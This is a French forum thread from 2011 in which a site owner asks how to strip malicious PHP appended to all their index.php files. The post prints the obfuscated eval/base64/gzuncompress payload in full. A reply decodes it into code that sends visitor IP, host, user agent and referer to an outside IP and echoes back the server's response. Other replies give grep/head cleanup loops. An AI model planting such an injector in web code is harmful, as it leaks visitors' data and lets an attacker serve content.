Forum Programmation.shell commande bulk pour modifier des fichiers

Posté par  .
Étiquettes : aucune
-1
16
nov.
2011

Bonjour,
j'ai subit une attaque sur mon hébergement .

Sur tous les fichiers index.php, j'ai un code qui a été ajouté à la fin du fichier ...

<?php eval(gzuncompress(base64_decode('eF5Tcffxd3L0CY5WjzcyNDG2NDc3MLGMV4+1dSwqSqzU0LQGAJCPCMM='))); eval(gzuncompress(base64_decode('eF5LK81LLsnMz1OINzczNTK1MDUy01DJ1KxWSbR1LCpKrNTQtC5KLSktylNISixONTOJT0lNzk9J1VBJjFbJjNW0rgUAqDUUxQ=='))); eval(gzuncompress(base64_decode('eF6VlMmyo0YURPeO8D94192hhQokhBSOXhSjmAoVVYDQxoGYJzFKAr7ez257Ya/6/UDevHkyMnmF9ddsfT6itumGZBy/3sMxOez/iJOojZOvXxKFo1GazvHOBGLA+eUaLVZpzajUZhTU15L3GFPsjAFRPMEAFudWy/H371++ffv2+2+//pL8xAHTODKmOT6slbE1tOJ1kiCDyoCxphgvMRm9qgExefekX133El0ismOkqGKP42MZLpKJpPMS8YTx4gSYVTsZZGe4IDdMec9Y+/pC3J1NwcNz5cbyxsZi7uQpYBHw88T+MPqTTulClndJI2Dx+I1owCJqXi0kAiGDr1PmpH+r/aTW/2IFVglZi6osknzT22+Yfz8mcjvS0l0L96TTiLuQ2MMek2IXbPSj2KrAO+ddAXvjWLWGHMfuyQrhhdkqAvz+CT+ojEYjqyB0rlslDwURXHJ71jw323da2R40mRpdS4G7wsjZXqfQjIck2hxOHc/bz77v+puTkrDPFsMoxgdVLn5dNCpjnotZMiFZKLX3LSu/xWPgnXXxxd2UgOtMuStvykbQOS04ZZINfXx9sg9l5G6GtgVvWJSG0uT8cr4x+pmL+C29MFouyy5VgBmk9WCjtJIuBwvaskyLo/De1BNIvYk6O/3liRUSN4tenILmuXaHUeqGNR7ouqyfyIb+1agxALuPZs5o1dYP9iuzSthDwkcnZgxky0cQ63OW8ELrc0LllmTOu7k3emSFNcicuCO11t2flxdnl3QngmRY8ipQ5yJo5i6sb69zN06yOgr1ja6SUyJPRVYU123gNYPkwhyM6zP7/hmmDAXA/GCKt2SMs9rXRPOUifjEuvCkhqLQ52ZxkHutKdrzZvO4+yIcdsdp/z5uwlMT7sqre/Bjns096xq4ppgfSHNomHt645A8tnLo1wPeKjUWwzM6Fy6801J9qwOWfUExd9U2eVAOZElU3Vc+2pdeJGosX+U022iZa0nW/LCIQLZPbjs0Rac9tmGfK+oW7k1LsaGMWZvsxuV9LSZ3/CDdQqpA6oCMr7F+OQDN42VrNztRLVGmOi9TZL02hmort/2iyAtvpWu7CtvHXihvbeyNn8nuv6vEBwCVFjuWGDCepDPG7JO788/0Obhcsd2DeRlXYhQvsSfZsjOV63USOcMk1bTUSCPFbCNq6xTUaK1OOuMJeqnc9RL5YMhciGs39OFn+PImRQj/d0cSdpLw+uFztQLmWu4BWyAXinlxV53ppnZdr6p5H9bhoKtpsK/1p2o8c7fu3ZZtENnLjisrS95ya6iLlxQIWqoLA1ELfAUFbpnNu2GfmFa1E5Lu+YrCNimZ6OyxMGmHhWwRwSIv9dFR9ryN1h02Q8pmGjVsNrsdOMNpBat/t0oYvWgkq/vhjiWxSxuuow+lR+virP659Lri9uDEEdZeK0HFT0Ig/8jlTymmN/I='))); ?>

Y a t'il une commande que je peux exécuter sur ssh pour virer cette portion de code de tous mes fichiers index.php (il y en un bon paquet)

Merci d'avance pour votre aide.

  • # sauvegardes

    Posté par  . Évalué à 7.

    en cas de compromission d'un serveur, le mieux est de tout réinstaller.

    Si tes fichiers d'index sont corrumpus, il serait plus judicieux de réutiliser tes sauvegardes (j'espère que tu en as faites).

    Only wimps use tape backup: real men just upload their important stuff on megaupload, and let the rest of the world ~~mirror~~ link to it

  • # sed

    Posté par  . Évalué à 3.

    http://www.grymoire.com/Unix/Sed.html

    Cette commande est magique. Mais +1 a mon voisin qui dit que tu ferais mieux de restaurer un backup.

    Pour chaque personne qui me plussoie, je frappe un fan de Justin Bieber.

  • # une piste, ma vie, tout ca

    Posté par  . Évalué à 3.

    si c'est toujours à la fin du fichier
    si c'est toujours le meme "code"

    alors un simple head doit te permettre de prendre l'ancien fichier et de le couper pour en faire le nouveau.

    quand ca m'arrive je fais un

    grep -ri motif commun>/tmp/liste_fichiers_veroles.txt

    ensuite je trie cette liste et je fais en sorte de ne garder que le nom des fichiers

    cat /tmp/liste_fichiers_veroles.txt | cut -d ':' -f1>/tmp/liste_fichiers_a_renommer.txt

    je renomme les fichiers en xxxx.old

    for i in cat /tmp/liste_fichiers_a_renommer.txt;do cp -p $i $i.old;done

    puis j'applique le filtre calculé plus haut (nombre de ligne à supprimer etant X)

    for i in cat /tmp/liste_fichiers_a_renommer.txt;do head -n-X $i.old > $i;done

    evidement on doit pouvoir simplifier tout ca en faisant des pipes entre chacune de mes lignes

    • [^] # Re: une piste, ma vie, tout ça

      Posté par  . Évalué à 1. 

      for i in $(grep -rli motif *); do cp -p $i{,.old} && head -n-X $i.old > $i; done

      motif et X étant exprimé comme dans le commentaire ci-avant.
      $i{,.old} étant un bashisme pour $i $i.old

  • # C'est quoi ce ver ?

    Posté par  . Évalué à 2.

    Sauf erreur de ma part, ce bout de script fait quelque chose comme ça :

    $url = 'http://91.196.216.64/btt.php?ip=' . $_SERVER['REMOTE_ADDR'] .
    '&host' . $_SERVER['HTTP_HOST'] . '&ua=' .
    urlencode($_SERVER['HTTP_USER_AGENT']) . '&ref=' .
    $_SERVER['HTTP_REFERER'];

if (function_exists('curl_version')) {
    $ch = curl_init($url);
    curl_setopt($ch, CURLOPT_RETURNTRANSFER, true);
    curl_setopt($ch, CURLOPT_HEADER, round(0));
    curl_setopt($ch, CURLOPT_TIMEOUT, round(3);
    $re = curl_exec($ch);
    curl_close($ch);
} else {
    $re = file_get_contents($url);
}

echo $re;

    Aucune idée de l'intérêt, par contre :/. Récolter quelques infos sur les machines infectées, j'imagine, mais j'ai vu plus dangereux.

Suivre le flux des commentaires

Note : les commentaires appartiennent à celles et ceux qui les ont postés. Nous n’en sommes pas responsables.